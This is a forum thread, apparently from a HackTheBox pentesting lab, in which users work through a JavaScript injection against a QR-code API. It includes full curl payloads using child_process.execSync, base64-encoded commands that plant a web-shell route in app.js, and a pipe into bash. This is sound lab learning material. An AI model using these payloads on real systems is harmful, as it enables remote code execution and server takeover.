Intro to Whitebox Pentesting - Target Function

No worries you are doing really well!

This: “{“text”: "'}) esentially needs to be more obfuscated
If you want to know

This: require(‘child_process’) needs something
If you want to know

This: .execSync(echo ‘YXBwLmdldCgiL2FwaS9jbWQiLCAocmVxLCByZXMpID0+IHsKICBjb25zdCBjbWQgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIikuZXhlY1N5bmMocmVxLnF1ZXJ5LmNtZCkudG9TdHJpbmcoKTsKICByZXMuc2VuZChjbWQpOwp9KTs=’)

Quotation needs to be at the beginning:

You then need to pipe it so server can base64 decode it, put it within the file and then you are correct on the last bit. This is how I did it though

This should all come up with a {“message”:“Could not generate QR code.”} message.

Though if this shows don’t worry it actually worked and then from there you will need to write the contents of the file name you piped the information to and send to the app.

Though that will obviously come later keep working on it though you are very close!

text should be with slashes btw like this

{ \"text\": \"'})

ok, now im sure that the command that im running its correct (i hope):

curl -s -X POST http://----------/api/service/generate
-H “Content-Type: application/json”
-H “Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InRlc3RAaGFja3RoZWJveC5jb20iLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3NDk0OTI5NzgsImV4cCI6MTc0OTU3OTM3OH0.55nW6_XD2wMUnTB0GEaI7ILQJwUqQAr_Msu5luLJzN8”
-d “{ "text": "'}) + console.log(require(‘child_process’).execSync(‘echo YXBwLmdldCgiL2FwaS9jbWQiLCAocmVxLCByZXMpID0+IHsKICBjb25zdCBjbWQgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIikuZXhlY1N5bmMocmVxLnF1ZXJ5LmNtZCkudG9TdHJpbmcoKTsKICByZXMuc2VuZChjbWQpOwp9KTs=’).toString()) //" }”

This sent an {“message”:“Could not generate QR code.”} message but the part where i have to pipe the payload into the server its making me trouble, can u explain me one last time that part?? my apologies for incovenient!

No inconvenience!

Your so close!

Just within the payload you will need to tell the server to decode it through after your base 64 payload

'echo YXBwLmdldCgiL2FwaS9jbWQiLCAocmVxLCByZXMpID0+IHsKICBjb25zdCBjbWQgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIikuZXhlY1N5bmMocmVxLnF1ZXJ5LmNtZCkudG9TdHJpbmcoKTsKICByZXMuc2VuZChjbWQpOwp9KTs= | base64 --decode > file.txt').toString())//\" }" 

After that, you will need to access that file that you gave to the server

"sed -i \"/app.use((req, res, next) => {/e cat file.txt\" src/app.js" | base64 -w0

Then use your previous command with the base64 encoded command to open the file.txt or whatever file name you specified

i dnt know if im doing something wrong but, im trying to reach the payload following the path in localhost:5000 /api/service/generate/payload.js using cURL but, nothing returned, ({“message”:“Could not find this route.”}) (its here where i uploaded that payload right?) im not a pro but i know how to access an endpoint, this exercise its giving me a headache =S hahaha
im about to ask u for every step that i take =/

Sorry for late reply!

The endpoint will be something like this

If you get {“message”:“Could not generate QR code.”} with ur payload, you should be able to get flag

This is probably the most important bit. You can use mine though if you wan to try it out for yourself then go ahead but here’s probably the most important bit

-d "{ \"text\": \"'})+ console.log(require('child_process').execSync('echo c2VkIC1pICIvYXBwLnVzZSgocmVxLCByZXMsIG5leHQpID0+IHsvZSBjYXQgcHduZWQudHh0IiBzcmMvYXBwLmpzCg== | base64 -d | bash').toString())//\" }"

man, hope you dnt judge me… but im done with this, i looked for a script that bring a smile to my face, and i solved it, after many days struggling with the sintax and the multiple combinations.
thank u so much for ur support and your time, i really apreciate that, hopefully in the future ill can help you with something =)

Well done man! I knew you were going to get it some time haha! Don’t hesitate to reach out for help at the end of the day we are all here to learn!